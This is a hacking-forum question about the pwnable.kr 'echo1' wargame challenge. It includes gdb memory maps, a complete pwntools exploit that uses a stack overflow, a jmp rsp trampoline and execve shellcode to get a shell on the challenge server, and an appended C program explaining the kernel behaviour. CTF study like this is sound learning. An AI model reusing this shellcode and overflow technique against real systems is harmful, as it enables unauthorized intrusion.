System Hacking

   turttle2s
pwnable.kr echo1 question 2 (spoiler warning)

http://www.hackerschool.org/HS_Boards/zboard.php?desc=desc&no=2011


Previous post: http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_system&no=2000

Earlier I posted a question because I could not understand the echo1 writeup even after reading it; it was not resolved, so I said I would come back to it later and moved on.

Now I am looking at the echo1 challenge again and I still do not understand it.

Clearly an overflow occurs in echo1, and NX is not enabled, so it looks like a challenge where you execute shellcode. The key question is how to get it executed; looking at the writeup, they store the opcode for jmp rsp (\xff\xe4) in the id area and then execute that. (rsp points at the shellcode.)

The problem is that the id area has no execute permission, so even if I store the opcode there I cannot execute it.
So even if I set rip to id, a SIGSEGV occurs as soon as it tries to execute. Locally, that is.
But when I do it remotely, it works? I am a bit confused; what am I missing?

[Debugging info]

(gdb) info proc
process 165283
cmdline = '/home/ubuntu/ctf/echo1'
cwd = '/home/ubuntu/ctf'
exe = '/home/ubuntu/ctf/echo1'


(gdb) !cat /proc/165283/maps
00400000-00401000 r-xp 00000000 ca:01 785621                             /home/ubuntu/ctf/echo1
00601000-00602000 r--p 00001000 ca:01 785621                             /home/ubuntu/ctf/echo1
00602000-00603000 rw-p 00002000 ca:01 785621                             /home/ubuntu/ctf/echo1   // no execute permission here
(omitted)
7ffffffde000-7ffffffff000 rwxp 00000000 00:00 0                          [stack]   // execute permission here
(omitted)


(gdb) p &id
$2 = (<data variable, no debug info> *) 0x6020a0 <id>


[Exploit code]
from pwn import *

#e = ELF("./echo1")
jmp_rsp = b"\xff\xe4"       # opcode bytes for `jmp rsp`; these go into the global id buffer
# 23-byte execve("/bin//sh", NULL, NULL) shellcode for x86-64
sc = b"\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"
p = remote("pwnable.kr", 9010)
#p = process("./echo1")

name = jmp_rsp              # the "name" is stored in id (0x6020a0, in .bss)
name_addr = 0x6020a0        # from `p &id` in gdb
p.sendline(name)
print(p.recvuntil(b"> "))
p.sendline(b"1")        # 1. BOF echo

payload = b"a"*0x20 + b"b"*0x8   # buf (0x20 bytes) + saved rbp (8 bytes)
payload += p64(name_addr)   # ret -> the jmp rsp stored in id
payload += sc               # after ret, rsp points here, so jmp rsp lands on the shellcode
p.sendline(payload)

p.interactive()


[Execution result]
$ python echo1.py
[+] Opening connection to pwnable.kr on port 9010: Done
b"hey, what's your name? : \n- select echo type -\n- 1. : BOF echo\n- 2. : FSB echo\n- 3. : UAF echo\n- 4. : exit\n> "
[*] Switching to interactive mode
hello \xff\xe4
$          aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbb\xa0 `
goodbye \xff\xe4
$              id
uid=1053(echo1) gid=1053(echo1) groups=1053(echo1)

  Hit : 1363     Date : 2022/10/05 12:21



    
turttle2s https://ray3708.tistory.com/28

Apparently the data region actually does have execute permission too, and the reason it was not applied locally is a kernel version difference.
2022/11/02
turttle2s I did not think to go into the challenge server and check. 2022/11/02
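The following is an added example, not code from the post or from pwnable.kr. It is a small C program for Linux x86-64 that checks the two things this thread turns on: whether a given address (here a buffer in .data, standing in for echo1's `id`) lies in a mapping with the x bit, and whether the process was started with the READ_IMPLIES_EXEC personality. On x86-64 kernels before Linux 5.8, a binary whose PT_GNU_STACK segment is executable or absent (echo1's stack shows as rwxp above) was given READ_IMPLIES_EXEC, which makes every readable mapping, .bss included, executable; from 5.8 on, an executable stack only makes the stack executable. That is the kernel version difference mentioned in the comment. The SAMPLE_MAPS text is copied from the gdb output in the post; the function names and the `data_stub` buffer are this example's own. Build with `gcc -z execstack` to mimic echo1's stack flags and run it on an old and a new kernel to see the difference.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/personality.h>

/* /proc/<pid>/maps lines copied from the local gdb session in the post:
 * .bss (0x602000-0x603000, where id lives) is rw-p, the stack is rwxp. */
static const char *SAMPLE_MAPS =
    "00400000-00401000 r-xp 00000000 ca:01 785621 /home/ubuntu/ctf/echo1\n"
    "00601000-00602000 r--p 00001000 ca:01 785621 /home/ubuntu/ctf/echo1\n"
    "00602000-00603000 rw-p 00002000 ca:01 785621 /home/ubuntu/ctf/echo1\n"
    "7ffffffde000-7ffffffff000 rwxp 00000000 00:00 0 [stack]\n";

/* Returns 1 if addr lies in a mapping whose perms include 'x', 0 if it is
 * mapped without 'x', and -1 if no line in maps_text covers it. */
int maps_exec_for(const char *maps_text, unsigned long addr)
{
    const char *line = maps_text;
    while (line && *line) {
        unsigned long start, end;
        char perms[5];
        if (sscanf(line, "%lx-%lx %4s", &start, &end, perms) == 3 &&
            addr >= start && addr < end)
            return perms[2] == 'x' ? 1 : 0;
        line = strchr(line, '\n');
        if (line)
            line++;
    }
    return -1;
}

/* 1 if the kernel gave this process READ_IMPLIES_EXEC (every readable mapping
 * is also executable), 0 otherwise. Before Linux 5.8, x86-64 set this for any
 * binary with an executable or missing PT_GNU_STACK, so .bss was rwx there. */
int read_implies_exec_active(void)
{
    return (personality(0xffffffff) & READ_IMPLIES_EXEC) ? 1 : 0;
}

/* Reads this process's own maps file into a malloc'd NUL-terminated buffer. */
static char *read_self_maps(void)
{
    FILE *f = fopen("/proc/self/maps", "r");
    if (!f)
        return NULL;
    size_t cap = 1 << 16, len = 0, n;
    char *buf = malloc(cap);
    if (!buf) { fclose(f); return NULL; }
    while ((n = fread(buf + len, 1, cap - len - 1, f)) > 0) {
        len += n;
        if (len + 1 >= cap) {
            char *tmp = realloc(buf, cap * 2);
            if (!tmp) { free(buf); fclose(f); return NULL; }
            buf = tmp;
            cap *= 2;
        }
    }
    buf[len] = '\0';
    fclose(f);
    return buf;
}

/* Hypothetical stand-in for echo1's id buffer: a jmp rsp trampoline (ff e4)
 * followed by a ret (c3), placed in .data. main() only ever calls the ret. */
unsigned char data_stub[] = { 0xff, 0xe4, 0xc3 };

int main(void)
{
    printf("READ_IMPLIES_EXEC personality: %s\n",
           read_implies_exec_active() ? "yes" : "no");

    char *maps = read_self_maps();
    if (!maps) { perror("/proc/self/maps"); return 1; }
    int x = maps_exec_for(maps, (unsigned long)data_stub);
    printf("data_stub at %p is %s\n", (void *)data_stub,
           x == 1 ? "executable" :
           x == 0 ? "NOT executable (a jmp rsp in .bss would SIGSEGV here)" :
                    "not found in maps");
    if (x == 1) {
        /* Same control transfer the exploit performs: jump into .data. */
        void (*stub)(void) = (void (*)(void))(data_stub + 2);
        stub();
        puts("returned from code in .data: a jmp rsp trampoline there works");
    }
    free(maps);
    return 0;
}
```

On a post-5.8 kernel the program reports "no" and "NOT executable" even when built with `-z execstack`, matching the local SIGSEGV in the post; on a kernel that still applies READ_IMPLIES_EXEC it reports "yes", finds the stub executable, and returns cleanly from the `ret` in .data, which is the condition the remote solution relies on.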